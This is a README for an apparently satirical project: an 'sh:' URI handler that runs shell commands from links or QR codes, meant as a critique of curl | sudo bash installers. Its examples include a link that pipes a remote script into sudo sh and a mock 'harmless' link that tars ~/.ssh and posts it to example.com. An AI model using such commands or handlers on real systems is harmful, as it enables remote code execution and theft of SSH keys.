"sh:" URI scheme handler
Combine the ease of QR codes with the power of curl | sudo bash!
This repository implemements an XDG handler for the sh: URI scheme,
letting one open such links from the browser, with xdg-open, or even by
scanning a QR code!
Examples
Basic direct usage:
sh-handler sh:xmessage%20Hello%2C%20World%21
xdg-open sh:xmessage%20Hello%2C%20World%21
A convenient "Install now" button on a website:
<a href="sh:curl%20example.com%2Finstall.sh%20%7C%20sudo%20sh">
Install now
</a>
Unfortunately Codeberg doesn't let us render links with nonstandard URL schemes, I wonder why.
One could also use QR codes, scanned with a laptop camera or such:
Totally harmless, just like this link:
sh:tar%20-cvzf%20-%20~%2F.ssh%7Ccurl%20-d-%20example.com
For some slightly more interactive examples, open sample.html in a checkout of this repository.
Installation
make
sudo make install
sudo update-desktop-database
Security implications
This is widly insecure and no one should use it. No seriously, this entire thing is a joke and hopefully that was obvious by now. It would be trivial to make a link or QR code that would steal your SSH keys or upload all your private files.
But what one must consider is that this is also the case for any
curl | bash-style installer. QR codes are similarly problematic.
Author
Sijmen J. Mulder (ik@sjmulder.nl). See LICENSE.md.